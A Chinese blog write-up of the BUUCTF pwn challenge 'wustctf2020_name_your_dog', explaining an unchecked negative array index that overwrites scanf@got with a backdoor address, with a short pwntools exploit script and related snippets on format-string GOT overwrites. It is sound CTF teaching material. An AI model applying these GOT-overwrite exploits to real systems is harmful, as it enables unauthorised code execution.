[BUUCTF]PWN——wustctf2020_name_your_dog(越界修改got表)

最新推荐文章于 2023-03-05 00:19:10 发布
最新推荐文章于 2023-03-05 00:19:10 发布
阅读量454 收藏
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/114946128
版权

wustctf2020_name_your_dog

  1. 例行检查,32位程序,开启了canary和nx
    在这里插入图片描述

  2. 本地试运行一下看看大概的情况
    在这里插入图片描述

  3. 32位ida载入,检索字符的时候发现了后门函数,shell_addr=0x80485cb
    在这里插入图片描述

  4. 主要函数,感觉跟cat那题差不多 在这里插入图片描述

  5. 漏洞函数
    在这里插入图片描述
    跟cat又有点不一样,cat的参数存储在栈上,可以通过计算buf与ret的偏移来修改ret为后门,这次的buf在bss段,没法获取栈地址。

  6. bss段距离got表不远,这边的想法是将printf@got修改成后门函数,这样在调用printf的时候就能获取shell了。
    但是在计算偏移的时候发现print@got的偏移不是8的整数倍
    在这里插入图片描述
    print@got偏移=(0x804a00c-0x0804A060)/8=–10.5
    看Namewitch函数发现scanf函数也会执行,就转变该scanf@got了
    scanf@got偏移=(0x804a028-0x0804A060)/8=–7

exp:

from pwn import *
p = remote("node3.buuoj.cn",25798)
#p = process("./wustctf2020_name_your_dog")
shell = 0x080485CB
p.sendlineafter(">",'-7')
p.sendlineafter("Give your name plz: ",p32(shell))

p.interactive()
Angel~Yan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
单片机脉冲发生器pwn,有proteus仿真图,及c代码
[BUUCTF-pwn]——wustctf2020_name_your_dog
Y_peak的博客
03-10 313
[BUUCTF-pwn]——wustctf2020_name_your_dog 题目地址:https://buuoj.cn/challenges#wustctf2020_name_your_dog checksec看下, 在IDA中看下, 竟然有后门函数,我们只需要执行该函数就好 看完代码发现, 没有什么可以溢出的地方. 唯一可以找到修改一些东西的只有, 这个函数, %7s虽然限定了长度但是足够写进去一个地址了. 看一下它的上一级, 调用发现Dogs在bss段距离got很近, 意味着我们可以修改
wustctf2020_name_your_dog
m0_57754423的博客
04-06 3088
这里存在数组越界,没有进行检查,所以我们可以任意地址写,这里写got为shell即可 from pwn import * p = remote("node4.buuoj.cn",27085) shell = 0x080485CB p.sendlineafter(">",'-7') p.sendlineafter("Give your name plz: ",p32(shell)) p.interactive() ...
BUUCTF之“wustctf2020_name_your_dog
Probeginner的博客
12-22 168
利用两次输入覆盖got.plt间接执行后门函数
wustctf2020_name_your_dog数组越界劫持got
m0_51251108的博客
11-05 239
wustctf2020_name_your_dog: 有一道类似的叫name_your_cat,是数组越界 逆向分析: 主界面 NameWhich函数: 根本没检查边界,num我们随便取,依旧数组越界 后门 具体步骤: got可写,got就在dog上面不远处,我们能改__isoc99_scanf,printf printf=0x0804A00C __isoc99_scanf=0x0804A028 dog=0x804a060 由于与print相差不是8的倍数,我们选scanf num填(0x28
字符串格式化漏洞修改GOT一例
Carrot_kexin的博客
10-17 844
代码如下: from pwn import * context(arch='amd64', os='linux') elf = ELF("./pwn") io = remote("111.200.241.244", 56315) catflag_addr = 0x4008DA puts_got = elf.got['puts'] payload = fmtstr_payload(6, {puts_got: catflag_addr}) io.recvuntil("3. Exit the battle") i
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
ARM7下PWN接口的使用源码,包含C语言及汇编
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
pwn信号发生器的源代码和仿真图,该程序可实现频率可调,占空比可调的pwm信号
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
pwn刷题num47---off by one 修改size大小,造成堆块重叠,控制chunk内容指针,泄露函数真实地址,修改got,调用system
tbsqigongzi的博客
05-04 484
BUUCTF-PWN-hitcontraining_heapcreator 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got仍可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE----函数地址为真实地址 动态链接 运行一下试试 功能基本上就是 1. 创建堆 2. 编辑堆 3.显示堆 4.删除堆 5.退出 ida看一下伪代码 主函数就是根据选择调用不
wustctf2020_name_your_cat
z1r0的博客
01-17 633
wustctf2020_name_your_cat 查看保护 可以看到v3是一个数组,而v0是namewhich返回值,假如参数v0可控那么v3就可以被溢出。 v2是namewhich的返回值,这里v2可控,vuln函数中v3可以进行溢出 距离ebp 0x34。0x34 + 4 = 8 * 7 = 56,v2为7时刚好可以覆盖到ret。这时再输入name为shell这个后门函数即可。 from pwn import * context(arch='i386', os='linux', log_lev
[BUUCTF]PWN——inndy_echo(32位fmt修改got
mcmuyanga的博客
02-01 823
inndy_echo 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下,看看大概的情况,已经看到存在格式化字符串漏洞了,而且还是可以一直输入的哪种 32位ida载入 看到程序里存在格式化字符串漏洞,而且有system函数,想到的是将printf@got修改为system@plt,由于一开始system没用执行,所以got里的地址不对,得用plt里的。然后传入bin/sh即可 pwntools集成了一个很强的工具,我们可以通过它快速修改对应的值, 命令格式: fmts
[BUUCTF]REVERSE——wdb_2018_2nd_easyfmt(32位格式化字符串修改got
mcmuyanga的博客
03-08 856
wdb_2018_2nd_easyfmt 附件 步骤 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,看交互式的情况,知道存在格式化字符串漏洞 32位ida载入 利用思路: 找到格式化字符的偏移量 打印print@got的地址,泄露libc,计算system的地址 将print@got修改成system,传入参数‘/bin/bash\x00’ 利用过程: 找到偏移为6 打印print@got的地址 printf_got=elf.got["printf"] payloa
【Android 逆向】函数拦截原理 ( 通过修改 GOT 全局偏移拦截函数 | 通过在实际被调用的函数中添加跳转代码实现函数拦截 )
让 学习 成为一种 习惯 ( 韩曙亮 の 技术博客 )
11-08 905
一、通过修改 GOT 全局偏移拦截函数、 二、通过在实际被调用的函数中添加跳转代码实现函数拦截、
printf 格式化 输出_64位格式化字符串漏洞修改got利用详解
weixin_39631295的博客
11-27 1241
前言格式化字符串漏洞是最基础也是很老的一个漏洞了,网上一搜索就会有一堆的解释、原理、以及利用,但全都是对32位的格式化漏洞的解析,64位的几乎没有,就算有也被一笔带过。但是当你利用格式化漏洞来修改64位elf的got时,你会发现并没有详细的那么简单,虽然和32位的原理一样,但payload的构建方法却有所差别。甚至难度也大大增加故此有了此处尝试以及尝试后的一些总结漏洞分析程序源码:#...
格式化字符串之在栈上修改got,执行system(“/bin/sh“)
fzucaicai的博客
03-05 709
举个例子, payload = fmtstr_payload(7 , {printf_got : system_addr}) 其中,7。
[攻防世界]noteservice2
m0_55906008的博客
01-15 270
一道基本的堆题
PLT/GOT在ctf pwn题目中的理解与运用 结合CSAPPchap7
weixin_46521144的博客
04-01 1299
由于之前没学过CSAPP第七章的时候,做pwn题时许多概念比如PLTGOT,.BSS段这些概念都不很清楚,按照学长的方法照猫画虎也算是能做出来。如今学习的时候是带着当时的问题学完了这一章。因此做一个小总结,主要是对本章和pwn中关联度较大的部分做一个说明。 网上讲到和GOThijack相关的题目时,大多是推荐阅读CSAPP和连接相关的章节。如果你翻到了这篇文章,那你也就不用再学习原著了 ????当然,如果像更深入的了解,还是推荐CSAPP的。因为毕竟不能面面俱到,并且或许也会有理解错的地方。 理解
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值